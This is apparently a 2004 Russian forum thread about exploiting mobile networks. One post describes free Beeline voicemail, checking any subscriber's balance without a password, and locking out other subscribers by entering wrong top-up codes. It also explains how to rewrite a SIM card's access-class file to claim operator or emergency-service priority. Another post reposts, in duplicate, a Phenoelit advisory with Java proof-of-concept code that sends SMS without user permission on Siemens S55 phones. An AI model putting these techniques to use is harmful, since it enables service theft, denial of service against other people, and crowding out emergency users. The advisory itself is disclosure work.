С ними удобно, особенно нахаляву
Всегда теперь ко всему новому буду читать инструкцию, потому что если умеешь соображать можно почерпнуть очень много полезного и бесплатного
Итак:
я вспомнил про такую хрень у Пчелофона, как голосовая почта.
Я ей никогда не пользовался, потому что денег жалко, а в воскресенье решил поискать способа сделать её халявной и мне это удалось.
Вычитал в памятке абонента что при роуминге в голосовую почту надо звонить по телефону +79039000600, а оказалось что можно звонить вообще с любого телефона, только приходится набирать номер телефона и пароль на голосовой ящик.
НО когда звонишь с мобилы на голосовой ящик, с тебя снимают деньги, а если с другого телефона то НЕТ!!!
И ещё одна уязвимость - можно позвонить на номер +79039000696 и набрать номер начинающийся с 7903 вам скажут его баланс БЕЗ запроса ввода пароля, хотя в памятке абонента указано что пароль должны спрашивать.
Есть несколько дырочек у Билайна:
1) бесплатная голосовая почта
2) можно узнать состояние баланса у любого абонента с номером из сети 903
3) и еще кстати я тут подумал что можно ведь и заблокировать любого абонента Пчелофона, достаточно использовать пункт 2, это ведь еще и удаленное пополнение баланса, а значит если неудачно вводить код с карточки Н-цать раз (50 при пополнении с помощью USSD), то телефон заблокируют.
Думаю, многие владельцы сотовых телефонов сталкивались с ситуацией, когда сеть перегружена и на любые попытки набора номера отвечает отказом. Самым распространенным примером являются массовые мероприятия, собирающие огромные толпы людей. В подобных случаях единственный способ дозвонится - постоянно набирать номер, что естественно, еще больше увеличивает нагрузку сети. Но как оказалось, перед ситуацией перенасыщения не все равны, хотя операторы об этом умалчивают. Результаты сравнительных опытов показали, что абоненты, пользующиеся наиболее дорогими тарифными планами, имеют преимущество перед абонентами с обычными тарифами. Я попытался разобраться в данной ситуации, и вот что выяснил: в описании стандарта GSM указано, что любой мобильный телефон принадлежит к одному из десяти пользовательских классов, каждому из которых в данный момент времени разрешается или не разрешается доступ к сети. Кроме того, имеются пять специальных классов, зарезервированных за различными спецслужбами, в том числе и персонал оператора(наивысший приоритет). И самое любопытное то, что информация о принадлежности пользователя к определенному классу содержится в SIM-карте(!). Возникает закономерный вопрос, а что нам мешает поменять приоритет, скажем на наивысший? =) Вот об этом я и попытаюсь коротко рассказать в этой статье.
Коротко о SIM.
SIM карта это асинхронная чип карта, спецификации ISO 7816 , работает по протоколу T=0, класс ISO A0h. Читается любым устройством для считывания поддерживающим этот протокол. Карточка содержит микропроцессор и память от 8 до 32 Кб(64, в недалеком будущем). Встроенный микропроцессор для обработки криптографической и другой информации. Есть набор стандартизированных команд для работы с картой (табл. 1).
Основные команды SIM
20h проверить CHV(pin)
24h изменить CHV(pin)
26h дезактивировать CHV(pin)
28h активировать CHV(pin)
C0h получить ответ
32h увеличить
04h объявлять недействительным
B0h считывать двойной код
B2h считать запись
44h восстановить
88h запустить алгоритм GSM
A2h поиск
A4h выбор
FAh режим ожидания
F2h состояние
2Ch разблокировка CHV(pin)
D6h обновить двойной код
CDh обновить запись
Имеет внутреннюю файловую систему, организованную в виде древовидной структуры директорий и поддиректорий (табл. 2)
MF(3F00)
DF(7FXX) EF(2FXX)
EF(6FXX)
Корневая директория MF(Master File) имеет идентификатор 3F00h, и содержит в себе поддиректории DF(Dedicated Files), идентификатор которых начинается на 7Fh, и файлы EF(Elementary File) которых начинается на 2Fh. Поддиректории, в свою очередь, тоже содержат фай, идентификатор которых начинается на 6Fh. Перемещение по структуре файлов осуществляется при помощи команды A4h (выбор). Каждый элементарный файл(EF) может принадлежать одному из трех следующих семейств: прозрачные, линейные и циклические. Он состоит из заголовка (header) и тела (body).
Заголовок детально описывает структуру файла и условия доступа к нему. Его можно прочитать после выбора файла с помощью команды C0h (получить ответ).
Тело содержит собственно данные, которые могут быть прочитаны с помощью команды B0h и B2h и записаны с помощью D6h и C0h.
Прозрачный файл состоит из определенного числа байтов, доступных по отдельности и блоками, для чего необходимо уточнить их относительный адрес(offset) и длину(length). Первый байт файла располагается по относительному адресу 0000h. Такими файлами можно без труда оперировать посредством любого устройства для считывания чип карт позволяющего вести прямой диалог через команды ISO.
Линейный файл состоит из последовательности записей(records) фиксированной длинны и в соответствии с этим должен рассматриваться как последовательный. Максимальный объем такого файла составляет 255 записей на 255 байт, не считая расширения(Ext 1, 2 и3).
Циклический файл содержит определенное число записей фиксированной длинны. При этом каждая новая запись всегда занимает первую позицию, в то время как последняя оказывается 'затертой'.
Классы доступа.
В стандарте GSM 02.11 дается определение десяти обычных классов доступа, имеющих номера с 0 по 9, и пяти специальных классов с 11 по 15:
11 зарезервировано за сетью
12 службы безопасности
13 общественные службы
14 службы скорой помощи
15 персонала оператора
Класс под номером 10 играет особую роль, поскольку по умолчанию к нему относятся все мобильные телефоны. Он управляет прохождением вызовов экстренной помощи( в частности, по номеру 112). Телефон обычного клиента принадлежит к одному единственному классу то 0 до 9, в то время как абонент, принадлежащий специальному классу, может, помимо этого, принадлежать еще и обычному.
Использование мобильного телефона в конкретной соте возможно только в том случае, если в данной местности, по крайней мере один из его классов имеет на то разрешение.
Информация о классе доступа хранится на SIM-карте в прозрачном файле по адресу 7F20:6F78(ACC, Access Control Class) и защищена конфиденциальным кодом пользователя CHV1(PIN 1). Данные в файле закодированы следующим образом:
00 01 класс 0
00 02 класс 1
00 04 класс 2
00 08 класс 3
00 10 класс 4
00 20 класс 5
00 40 класс 6
00 80 класс 7
01 00 класс 8
02 00 класс 9
0 класс 10
08 00 класс 11
10 00 класс 12
20 00 класс 13
40 00 класс 14
80 00 класс 15
Одновременная принадлежность к нескольким классам сводится к простому сложению соответствующих величин.
 |
 |
 |
 |
Дмитровский Форум V2
(18+) Во времена всеобщей лжи говорить правду — это экстремизм
С ними удобно, особенно нахаляву
Сообщений: 2
• Страница 1 из 1
С ними удобно, особенно нахаляву
xxxx1 » Чт апр 29, 2004 16:50 pm
-
xxxx1 - Xxx...
- Сообщения: 723
- Зарегистрирован: Чт мар 04, 2004 9:36 am
xxxx1 » Чт апр 29, 2004 17:41 pm
Неавторизованная отправка SMS сообщений в Siemens S55 телефонах
Уязвимость обнаружена в Siemens S55 телефонах. Удаленный пользователь может заставить телефон целевого пользователя послать SMS сообщение.
Удаленный пользователь может сконструировать JAVA код, который, когда будет загружен целевым пользователем, пошлет SMS сообщение от системы целевого пользователя не спрашивая на это разрешение.
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++>
[ Authors ]
FtR <[email protected]>
FX <[email protected]>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
Siemens S55
Possibly others
Siemens : Not assigned
[ Vendor communication ]
09/Nov/03 Initial Notification, [email protected]
*Note-Initial notification by phenoelit
includes a cc to [email protected] by default
[ Overview ]
The Siemens S55 is a cellphone and provides a Java virtual machine
including a full featured API for additional software development
by third parties.
[ Description ]
The Java API provides the possibilty to send out SMS messages through
the Java Applications. This interface will ask for permissions to send
out the SMS by presenting a message screen.
The API also provides objects which alow a programmer to create
personal screen layouts for his applications
The vulnerability found can be described as a race condition
which allows the programmer to overlay the message which asks for
permission by his own screen craft.
The result of that vulnerability will allow any program to
send SMS to any number without notification to the user
[ Example ]
package hello;
import javax.microedition.lcdui.*;
import javax.microedition.midlet.*;
import com.siemens.mp.game.Sound;
import com.siemens.mp.gsm.*;
import java.lang.*;
import java.io.*;
public class hello extends MIDlet implements CommandListener
{
static final String EXIT_COMMAND_LABEL = "Exit FtRs world";
Display display;
static hello hello;
public void startApp (){
HelloCanva kanvas = new HelloCanva();
Scr2 scr2 = new Scr2();
display = Display.getDisplay(this);
// Menu
Command exitCommand = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0);
scr2.addCommand(exitCommand);
scr2.setCommandListener(this);
//Data
// screen 1
display.setCurrent(kanvas);
mycall();
// screen 2
display.setCurrent(scr2);
//destroyApp(false);
}
public void mycall(){
String SMSstr= "Test";
try {
/* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/
SMS.send("0170-Numder", SMSstr);
}
/* Exception handling */
catch (com.siemens.mp.NotAllowedException ex) {
// Some handling code ...
}
catch (IOException ex) {
//Some handling code ...
}
catch (IllegalArgumentException ex) {
// Some handling code ...
}
} //public viod call()
protected void destroyApp (boolean b){
display.setCurrent(null);
this.notifyDestroyed(); // notify KVM
}
protected void pauseApp ()
{ }
public void commandAction (Command c, Displayable d){
destroyApp(false);
}
}
class HelloCanva extends Canvas
{
public void paint (Graphics g)
{
String str = new String("Wanna Play?");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER
| Graphics.BASELINE);
g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER |
Graphics.BASELINE);
}
}
class Scr2 extends Canvas
{
public void paint (Graphics g) {
String str = new String("cool");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
}
}
[ Solution ]
None known at this time.
[ end of file ]
--
#!/usr/local/bin/perl
print&f(($_=(3x3)."3+33")=~s=3(?![^3]|$)=&f=eg);
sub f{eval(@_?$_:"'$&+'x3");}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Уязвимость обнаружена в Siemens S55 телефонах. Удаленный пользователь может заставить телефон целевого пользователя послать SMS сообщение.
Удаленный пользователь может сконструировать JAVA код, который, когда будет загружен целевым пользователем, пошлет SMS сообщение от системы целевого пользователя не спрашивая на это разрешение.
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++>
[ Authors ]
FtR <[email protected]>
FX <[email protected]>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
Siemens S55
Possibly others
Siemens : Not assigned
[ Vendor communication ]
09/Nov/03 Initial Notification, [email protected]
*Note-Initial notification by phenoelit
includes a cc to [email protected] by default
[ Overview ]
The Siemens S55 is a cellphone and provides a Java virtual machine
including a full featured API for additional software development
by third parties.
[ Description ]
The Java API provides the possibilty to send out SMS messages through
the Java Applications. This interface will ask for permissions to send
out the SMS by presenting a message screen.
The API also provides objects which alow a programmer to create
personal screen layouts for his applications
The vulnerability found can be described as a race condition
which allows the programmer to overlay the message which asks for
permission by his own screen craft.
The result of that vulnerability will allow any program to
send SMS to any number without notification to the user
[ Example ]
package hello;
import javax.microedition.lcdui.*;
import javax.microedition.midlet.*;
import com.siemens.mp.game.Sound;
import com.siemens.mp.gsm.*;
import java.lang.*;
import java.io.*;
public class hello extends MIDlet implements CommandListener
{
static final String EXIT_COMMAND_LABEL = "Exit FtRs world";
Display display;
static hello hello;
public void startApp (){
HelloCanva kanvas = new HelloCanva();
Scr2 scr2 = new Scr2();
display = Display.getDisplay(this);
// Menu
Command exitCommand = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0);
scr2.addCommand(exitCommand);
scr2.setCommandListener(this);
//Data
// screen 1
display.setCurrent(kanvas);
mycall();
// screen 2
display.setCurrent(scr2);
//destroyApp(false);
}
public void mycall(){
String SMSstr= "Test";
try {
/* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/
SMS.send("0170-Numder", SMSstr);
}
/* Exception handling */
catch (com.siemens.mp.NotAllowedException ex) {
// Some handling code ...
}
catch (IOException ex) {
//Some handling code ...
}
catch (IllegalArgumentException ex) {
// Some handling code ...
}
} //public viod call()
protected void destroyApp (boolean b){
display.setCurrent(null);
this.notifyDestroyed(); // notify KVM
}
protected void pauseApp ()
{ }
public void commandAction (Command c, Displayable d){
destroyApp(false);
}
}
class HelloCanva extends Canvas
{
public void paint (Graphics g)
{
String str = new String("Wanna Play?");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER
| Graphics.BASELINE);
g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER |
Graphics.BASELINE);
}
}
class Scr2 extends Canvas
{
public void paint (Graphics g) {
String str = new String("cool");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
}
}
[ Solution ]
None known at this time.
[ end of file ]
--
#!/usr/local/bin/perl
print&f(($_=(3x3)."3+33")=~s=3(?![^3]|$)=&f=eg);
sub f{eval(@_?$_:"'$&+'x3");}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
-
xxxx1 - Xxx...
- Сообщения: 723
- Зарегистрирован: Чт мар 04, 2004 9:36 am
Сообщений: 2
• Страница 1 из 1
Вернуться в Полезная информация
Кто сейчас на конференции
Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 4